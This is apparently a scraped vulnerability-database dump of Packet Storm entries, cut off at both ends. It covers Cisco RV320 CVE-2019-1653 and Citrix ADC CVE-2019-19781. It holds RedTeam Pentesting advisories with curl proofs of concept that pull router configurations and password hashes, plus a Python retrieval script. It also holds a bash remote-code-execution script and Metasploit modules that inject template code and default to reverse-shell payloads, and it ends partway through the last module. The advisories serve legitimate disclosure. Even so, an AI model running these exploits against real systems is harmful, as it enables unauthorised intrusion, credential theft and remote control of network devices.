\n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. \n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151312/rt-sa-2018-003.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-28T22:53:28", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Unauthenticated Diagnostic Data Retrieval", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152261", "href": "https://packetstormsecurity.com/files/152261/Cisco-RV320-Unauthenticated-Diagnostic-Data-Retrieval.html", "sourceData": "`Advisory: Cisco RV320 Unauthenticated Diagnostic Data Retrieval \n \nRedTeam Pentesting discovered that the Cisco RV320 router still exposes \nsensitive diagnostic data without authentication via the device's web \ninterface due to an inadequate fix by the vendor. 
\n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15 through 1.4.2.20 \nFixed Versions: none \nVulnerability Type: Information Disclosure \nSecurity Risk: high \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \nVendor Status: working on patch \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-004 \nAdvisory Status: published \nCVE: CVE-2019-1653 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based \nconfiguration interface, which is implemented in various CGI programs in \nthe device's firmware. Access to this web interface requires prior \nauthentication using a username and password. Previously, RedTeam \nPentesting identified a vulnerability (rt-sa-2018-003) [2] in the CGI \nprogram: \n \n/cgi-bin/export_debug_msg.exp \n \nBy issuing an HTTP POST request to this program, it was possible to \nretrieve various diagnostic information from the device, including its \ncurrent configuration. This request did not require any prior \nauthentication. Cisco addressed this vulnerability in firmware version \n1.4.2.19 [3]. \n \nRedTeam Pentesting discovered that the CGI program in the patched \nfirmware is still vulnerable. The user agent \"curl\" is blacklisted by \nthe firmware and must be adjusted in the HTTP client. Again, \nexploitation does not require any authentication. 
\n \n \nProof of Concept \n================ \n \nThe diagnostic data can be retrieved by issuing an HTTP POST request to \nthe vulnerable CGI program. OpenSSL is used to decrypt the data with the \nhard-coded password \"NKDebug12#$%\" before unpacking it with tar (output \nshortened): \n \n------------------------------------------------------------------------ \n$ curl -k -A kurl -X POST --data 'submitdebugmsg=1' \\ \n'https://192.168.1.1/cgi-bin/export_debug_msg.exp' > debug \n \n$ openssl aes-128-cbc -salt -md md5 -d \\ \n-k 'NKDebug12#$%' < debug > debug.tgz \n \n$ mkdir output && tar -xf debug.tgz -C output/ \n \n$ ls -1 output/ \ndebug_messages.txt \netc.tgz \nnk_sysconfig \nvar.tgz \n \n$ cat output/nk_sysconfig \n####sysconfig#### \n[VERSION] \nVERSION=73 \nMODEL=RV320 \nSSL=0 \nIPSEC=0 \nPPTP=0 \nPLATFORMCODE=RV0XX \n[...] \n[SYSTEM] \nHOSTNAME=router \nDOMAINNAME=example.com \nDOMAINCHANGE=1 \nUSERNAME=cisco \nPASSWD=066bae9070a9a95b3e03019db131cd40 \n[...] \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nPrevent untrusted clients from connecting to the device's web server. \n \n \nFix \n=== \n \nNone \n \n \nSecurity Risk \n============= \n \nThis vulnerability is rated as a high risk as it exposes sensitive \ndiagnostic information, such as the device's configuration, to \nuntrusted, potentially malicious parties. By retrieving this \ninformation, attackers can obtain internal network configuration, VPN or \nIPsec secrets, as well as password hashes for the router's user \naccounts. Knowledge of a user's password hash is sufficient to log into \nthe router's web interface, cracking of the hash is not required. Any \ninformation obtained through exploitation of this vulnerability can be \nused to facilitate further compromise of the device itself or attached \nnetworks. 
\n \n \nTimeline \n======== \n \n2018-09-19 Original vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-11-18 List of affected versions provided by vendor \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-22 Firmware 1.4.2.20 released by vendor \n2019-01-23 Advisory (rt-sa-2018-003) published \n \n2019-02-07 Incomplete mitigation of vulnerability identified \n2019-02-08 Proof of concept sent to vendor \n2019-02-08 Receipt of proof of concept acknowledged by vendor \n2019-02-15 Full advisory sent to vendor \n2019-02-15 Notified vendor of disclosure date: 2019-03-27 \n2019-03-25 Requested progress update from vendor \n2019-03-25 Vendor requests postponed disclosure \n2019-03-25 Postponement declined \n2019-03-27 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-003 \n[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. 
\n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152261/rt-sa-2019-004.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-03-28T22:53:29", "description": "", "cvss3": {}, "published": "2019-03-27T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Unauthenticated Configuration Export", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-03-27T00:00:00", "id": "PACKETSTORM:152260", "href": "https://packetstormsecurity.com/files/152260/Cisco-RV320-Unauthenticated-Configuration-Export.html", "sourceData": "`Advisory: Cisco RV320 Unauthenticated Configuration Export \n \nRedTeam Pentesting discovered that the configuration of a Cisco RV320 \nrouter can still be exported without authentication via the device's web \ninterface due to an inadequate fix by the vendor. 
\n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15 through 1.4.2.20 \nFixed Versions: none \nVulnerability Type: Information Disclosure \nSecurity Risk: high \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \nVendor Status: working on patch \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-003 \nAdvisory Status: published \nCVE: CVE-2019-1653 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based \nconfiguration interface, which is implemented in various CGI programs in \nthe device's firmware. Access to this web interface requires prior \nauthentication using a username and password. Previously, RedTeam \nPentesting identified a vulnerability (rt-sa-2018-002) [2] in the CGI \nprogram: \n \n/cgi-bin/config.exp \n \nBy issuing an HTTP GET request to this program, it was possible to \nexport a router's configuration without providing any prior \nauthentication. This vulnerability was addressed in firmware version \n1.4.2.19 published by Cisco [3]. \n \nRedTeam Pentesting discovered that the CGI program in the patched \nfirmware is still vulnerable. By performing a specially crafted HTTP \nPOST request, attackers are still able to download the router's \nconfiguration. The user agent \"curl\" is blacklisted by the firmware and \nmust be adjusted in the HTTP client. Again, exploitation does not \nrequire any authentication. 
\n \n \nProof of Concept \n================ \n \nA device's configuration can be retrieved by issuing an HTTP POST request \nto the vulnerable CGI program (output shortened): \n \n------------------------------------------------------------------------ \n$ curl -s -k -A kurl -X POST --data 'submitbkconfig=0' \\ \n'https://192.168.1.1/cgi-bin/config.exp' \n####sysconfig#### \n[VERSION] \nVERSION=73 \nMODEL=RV320 \nSSL=0 \nIPSEC=0 \nPPTP=0 \nPLATFORMCODE=RV0XX \n[...] \n[SYSTEM] \nHOSTNAME=router \nDOMAINNAME=example.com \nDOMAINCHANGE=1 \nUSERNAME=cisco \nPASSWD=066bae9070a9a95b3e03019db131cd40 \n[...] \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nPrevent untrusted clients from connecting to the device's web server. \n \n \nFix \n=== \n \nNone \n \n \nSecurity Risk \n============= \n \nThis vulnerability is rated as a high risk as it exposes the device's \nconfiguration to untrusted, potentially malicious parties. By \ndownloading the configuration, attackers can obtain internal network \nconfiguration, VPN or IPsec secrets, as well as password hashes for the \nrouter's user accounts. Knowledge of a user's password hash is \nsufficient to log into the router's web interface, cracking of the hash \nis not required. Any information obtained through exploitation of this \nvulnerability can be used to facilitate further compromise of the device \nitself or attached networks. 
\n \n \nTimeline \n======== \n \n2018-09-19 Original vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-11-18 List of affected versions provided by vendor \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-22 Firmware 1.4.2.20 released by vendor \n2019-01-23 Advisory (rt-sa-2018-002) published \n \n2019-02-07 Incomplete mitigation of vulnerability identified \n2019-02-08 Proof of concept sent to vendor \n2019-02-08 Receipt of proof of concept acknowledged by vendor \n2019-02-15 Full advisory sent to vendor \n2019-02-15 Notified vendor of disclosure date: 2019-03-27 \n2019-03-25 Requested progress update from vendor \n2019-03-25 Vendor requests postponed disclosure \n2019-03-25 Postponement declined \n2019-03-27 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://www.redteam-pentesting.de/advisories/rt-sa-2018-002 \n[3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. 
\n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/152260/rt-sa-2019-003.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-01-29T10:40:54", "description": "", "cvss3": {}, "published": "2019-01-29T00:00:00", "type": "packetstorm", "title": "Cisco RV300 / RV320 Information Disclosure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-29T00:00:00", "id": "PACKETSTORM:151374", "href": "https://packetstormsecurity.com/files/151374/Cisco-RV300-RV320-Information-Disclosure.html", "sourceData": "`# Exploit Title: 6coRV Exploit \n# Date: 01-26-2018 \n# Exploit Author: Harom Ramos [Horus] \n# Tested on: Cisco RV300/RV320 \n# CVE : CVE-2019-1653 \n \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nfrom fake_useragent import UserAgent \n \ndef random_headers(): \nreturn dict({'user-agent': UserAgent().random}) \n \ndef request(url): \nr = requests.Session() \ntry: \nget = r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False \nif get.status_code == 200: \nreturn get.text \nexcept requests.ConnectionError: \nreturn 'Error Conecting' \nexcept requests.Timeout: \nreturn 'Error Timeout' \nexcept KeyboardInterrupt: \nraise \nexcept: \nreturn 0 \n \nprint(\"\") 
\nprint(\"##################################################\") \nprint(\"CISCO CVE-2019-1653 POC\") \nprint(\"From H. with love\") \nprint(\"\") \n \nurl = raw_input(\"URL> EX:http://url:port/ \") \nurl = url + \"/cgi-bin/config.exp\" \nprint(request(url)) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151374/ciscorv300320-disclose.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-01-29T02:48:41", "description": "", "cvss3": {}, "published": "2019-01-24T00:00:00", "type": "packetstorm", "title": "Cisco RV320 Unauthenticated Configuration Export", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-1653"], "modified": "2019-01-24T00:00:00", "id": "PACKETSTORM:151311", "href": "https://packetstormsecurity.com/files/151311/Cisco-RV320-Unauthenticated-Configuration-Export.html", "sourceData": "`Advisory: Cisco RV320 Unauthenticated Configuration Export \n \nRedTeam Pentesting discovered that the configuration of a Cisco RV320 \nrouter may be exported without authentication through the device's web \ninterface. \n \n \nDetails \n======= \n \nProduct: Cisco RV320 Dual Gigabit WAN VPN Router, possibly others \nAffected Versions: 1.4.2.15, 1.4.2.17 \nFixed Versions: since 1.4.2.19 \nVulnerability Type: Information Disclosure \nSecurity Risk: high \nVendor URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info \nVendor Status: fixed version released \nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2018-002 \nAdvisory Status: published \nCVE: CVE-2019-1653 \nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1653 \n \n \nIntroduction \n============ \n \n\"Keep your employees, your business, and yourself productive and \neffective. 
The Cisco RV320 Dual Gigabit WAN VPN Router is an ideal \nchoice for any small office or small business looking for performance, \nsecurity, and reliability in its network.\" \n(from the Cisco RV320 product page [1]) \n \n \nMore Details \n============ \n \nThe Cisco RV320 Dual Gigabit WAN VPN Router provides a web-based \nconfiguration interface. In the device's firmware, this functionality is \nimplemented using a variety of CGI programs. Access to this web \ninterface requires prior authentication using a username and password. \nRedTeam Pentesting discovered the CGI program: \n \n/cgi-bin/config.exp \n \nThis program can be used to export the router's configuration. In \ncontrast to other functions, this CGI program does not require any form \nof authentication. It may be accessed through the router's web server, \nwhich is available from the LAN by default. As described in [2], \nfirmware versions from 1.4.2 to 1.4.2.15 (including) also expose the web \nserver to the WAN on TCP port 8007. \n \n \nProof of Concept \n================ \n \nA device's configuration can be retrieved by issuing an HTTP GET request \nto the vulnerable CGI program (output shortened): \n \n------------------------------------------------------------------------ \n$ curl -s http://192.168.1.1/cgi-bin/config.exp \n####sysconfig#### \n[VERSION] \nVERSION=73 \nMODEL=RV320 \nSSL=0 \nIPSEC=0 \nPPTP=0 \nPLATFORMCODE=RV0XX \n[...] \n[SYSTEM] \nHOSTNAME=router \nDOMAINNAME=example.com \nDOMAINCHANGE=1 \nUSERNAME=cisco \nPASSWD=066bae9070a9a95b3e03019db131cd40 \n[...] \n------------------------------------------------------------------------ \n \n \nWorkaround \n========== \n \nPrevent untrusted clients from connecting to the device's web server. \n \n \nFix \n=== \n \nInstall firmware version 1.4.2.19 (or later) on the router. 
\n \n \nSecurity Risk \n============= \n \nThis vulnerability is rated as a high risk as it exposes the device's \nconfiguration to untrusted, potentially malicious parties. By \ndownloading the configuration, attackers can obtain internal network \nconfiguration, VPN or IPsec secrets, as well as password hashes for the \nrouter's user accounts. Knowledge of a user's password hash is \nsufficient to log into the router's web interface. Any information \nobtained through exploitation of this vulnerability can be used to \nfacilitate further compromise of the device itself or attached networks. \n \n \nTimeline \n======== \n \n2018-09-19 Vulnerability identified \n2018-09-27 Customer approved disclosure to vendor \n2018-09-28 Vendor notified \n2018-10-05 Receipt of advisory acknowledged by vendor \n2018-10-05 Notified vendor of disclosure date: 2019-01-09 \n2018-11-18 List of affected versions provided by vendor \n2018-12-21 Postponing disclosure to 2019-01-23, as requested by vendor \n2019-01-23 Advisory published \n \n \nReferences \n========== \n \n[1] https://www.cisco.com/c/en/us/products/routers/rv320-dual-gigabit-wan-vpn-router/index.html \n[2] https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801 \n \n \nRedTeam Pentesting GmbH \n======================= \n \nRedTeam Pentesting offers individual penetration tests performed by a \nteam of specialised IT-security experts. Hereby, security weaknesses in \ncompany networks or products are uncovered and can be fixed immediately. \n \nAs there are only few experts in this field, RedTeam Pentesting wants to \nshare its knowledge and enhance the public knowledge with research in \nsecurity-related areas. The results are made available as public \nsecurity advisories. 
\n \nMore information about RedTeam Pentesting can be found at: \nhttps://www.redteam-pentesting.de/ \n \nWorking at RedTeam Pentesting \n============================= \n \nRedTeam Pentesting is looking for penetration testers to join our team \nin Aachen, Germany. If you are interested please visit: \nhttps://www.redteam-pentesting.de/jobs/ \n \n-- \nRedTeam Pentesting GmbH Tel.: +49 241 510081-0 \nDennewartstr. 25-27 Fax : +49 241 510081-99 \n52068 Aachen https://www.redteam-pentesting.de \nGermany Registergericht: Aachen HRB 14004 \nGesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/151311/rt-sa-2018-002.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-13T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway 10.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "PACKETSTORM:155930", "href": "https://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC Remote Code Execution', \n'Description' => %q( \nAn issue was discovered in Citrix Application Delivery Controller (ADC) \nand Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal. 
\n), \n'Author' => [ \n'RAMELLA S\u00e9bastien' # https://www.pirates.re/ \n], \n'References' => [ \n['CVE', '2019-19781'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'], \n['EDB', '47901'], \n['EDB', '47902'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['unix'], \n'Arch' => ARCH_CMD, \n'Privileged' => true, \n'Payload' => { \n'Compat' => { \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl meterpreter' \n} \n}, \n'Targets' => [ \n['Unix (remote shell)', \n'Type' => :cmd_shell, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_perl', \n'DisablePayloadHandler' => 'false' \n} \n], \n['Unix (command-line)', \n'Type' => :cmd_generic, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/generic', \n'DisablePayloadHandler' => 'true' \n} \n], \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n)) \n \nregister_options([ \nOptAddress.new('RHOST', [true, 'The target address']) \n]) \n \nregister_advanced_options([ \nOptBool.new('ForceExploit', [false, 'Override check result', false]) \n]) \n \nderegister_options('RHOSTS') \nend \n \ndef execute_command(command, opts = {}) \nfilename = Rex::Text.rand_text_alpha(16) \nnonce = Rex::Text.rand_text_alpha(6) \n \nrequest = { \n'method' => 'POST', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', 'scripts', 'newbm.pl'), \n'headers' => { \n'NSC_USER' => '../../../netscaler/portal/templates/' + filename, \n'NSC_NONCE' => nonce \n}, \n'vars_post' => { \n'url' => 'http://127.0.0.1', \n'title' => \"[% template.new({'BLOCK'='print readpipe(#{get_chr_payload(command)})'})%]\", \n'desc' => 'desc', \n'UI_inuse' => 'RfWeb' \n}, \n'encode_params' => false \n} \n \nbegin \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, 
::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \n \nif received.code == 200 \nvprint_status(\"#{received.get_html_document.text}\") \nsleep 2 \n \nrequest = { \n'method' => 'GET', \n'uri' => normalize_uri('vpn', '..', 'vpns', 'portal', filename + '.xml'), \n'headers' => { \n'NSC_USER' => nonce, \n'NSC_NONCE' => nonce \n} \n} \n \n## Trigger to gain exploitation. \nbegin \nsend_request_cgi(request) \nreceived = send_request_cgi(request) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \nreturn false unless received \nreturn received \nend \n \nreturn false \nend \n \ndef get_chr_payload(command) \nchr_payload = command \ni = chr_payload.length \n \noutput = \"\" \nchr_payload.each_char do | c | \ni = i - 1 \noutput << \"chr(\" << c.ord.to_s << \")\" \nif i != 0 \noutput << \" . \" \nend \nend \n \nreturn output \nend \n \ndef check \nbegin \nreceived = send_request_cgi( \n\"method\" => \"GET\", \n\"uri\" => normalize_uri('vpn', '..', 'vpns', 'cfg', 'smb.conf') \n) \nrescue ::OpenSSL::SSL::SSLError, ::Errno::ENOTCONN \nprint_error('Unable to connect on the remote target.') \nend \n \nif received && received.code != 200 \nreturn Exploit::CheckCode::Safe \nend \nreturn Exploit::CheckCode::Vulnerable \nend \n \ndef exploit \nunless check.eql? 
Exploit::CheckCode::Vulnerable \nunless datastore['ForceExploit'] \nfail_with(Failure::NotVulnerable, 'The target is not exploitable.') \nend \nelse \nprint_good('The target appears to be vulnerable.') \nend \n \ncase target['Type'] \nwhen :cmd_generic \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nreceived = execute_command(payload.encoded) \nif (received) && (datastore['PAYLOAD'] == \"cmd/unix/generic\") \nprint_warning('Dumping command output in parsed http response') \nprint_good(\"#{received.get_html_document.text}\") \nelse \nprint_warning('Empty response, no command output') \nreturn \nend \n \nwhen :cmd_shell \nprint_status(\"Sending #{datastore['PAYLOAD']} command payload\") \nvprint_status(\"Generated command payload: #{payload.encoded}\") \n \nexecute_command(payload.encoded) \nend \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155930/citrix-exec.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-13T22:40:41", "description": "", "cvss3": {}, "published": "2020-01-11T00:00:00", "type": "packetstorm", "title": "Citrix Application Delivery Controller / Gateway Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T00:00:00", "id": "PACKETSTORM:155904", "href": "https://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html", "sourceData": "`#!/bin/bash \n# Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781 \n# Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a' \n# Release Date : 11/01/2020 \n# Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia \necho 
\"================================================================================= \n___ _ _ ____ ___ _ _ \n| _ \\ _ _ ___ (_) ___ __ | |_ |_ / ___ _ _ ___ |_ _| _ _ __| |(_) __ _ \n| _/| '_|/ _ \\ | |/ -_)/ _|| _| / / / -_)| '_|/ _ \\ | | | ' \\ / _' || |/ _' | \n|_| |_| \\___/_/ |\\___|\\__| \\__| /___|\\___||_| \\___/ |___||_||_|\\__,_||_|\\__,_| \n|__/ CVE-2019-19781 \n=================================================================================\" \n############################## \nif [ -z \"$1\" ]; \nthen \necho -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\\n' \nexit; \nfi \nfilenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1); \ncurl -s -k \"https://$1/vpn/../vpns/portal/scripts/newbm.pl\" -d \"url=http://example.com\\&title=[%25+template.new({'BLOCK'%3d'exec(\\'$2 | tee /netscaler/portal/templates/$filenameid.xml\\')%3b'})+%25]\\&desc=test\\&UI_inuse=RfWeb\" -H \"NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid\" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is \necho -ne \"\\n\" ;curl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -s -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \necho -ne \"Command Output :\\n\" \ncurl -m 3 -k \"https://$1/vpn/../vpns/portal/$filenameid.xml\" -H \"NSC_NONCE: pwnpzi1337\" -H \"NSC_USER: pwnpzi1337\" --path-as-is \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/155904/citrixadcg-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-14T23:23:57", "description": "", "cvss3": {}, "published": "2020-01-14T00:00:00", "type": "packetstorm", "title": "Citrix ADC (NetScaler) Directory Traversal / Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-14T00:00:00", "id": "PACKETSTORM:155947", "href": 
"https://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::CheckModule \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka \nNetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload. \n}, \n'Author' => [ \n'Project Zero India', 'TrustedSec', # PoCs \n'mekhalleh (RAMELLA S\u00e9bastien)' # Module (https://www.pirates.re/) \n], \n'References' => [ \n['CVE', '2019-19781'], \n['EDB', '47901'], \n['EDB', '47902'], \n['URL', 'https://support.citrix.com/article/CTX267027/'], \n['URL', 'https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'] \n], \n'DisclosureDate' => '2019-12-17', \n'License' => MSF_LICENSE, \n'Platform' => ['python', 'unix'], \n'Arch' => [ARCH_PYTHON, ARCH_CMD], \n'Privileged' => false, \n'Targets' => [ \n['Python', \n'Platform' => 'python', \n'Arch' => ARCH_PYTHON, \n'Type' => :python, \n'DefaultOptions' => {'PAYLOAD' => 'python/meterpreter/reverse_tcp'} \n], \n['Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_command, \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_perl'} \n] 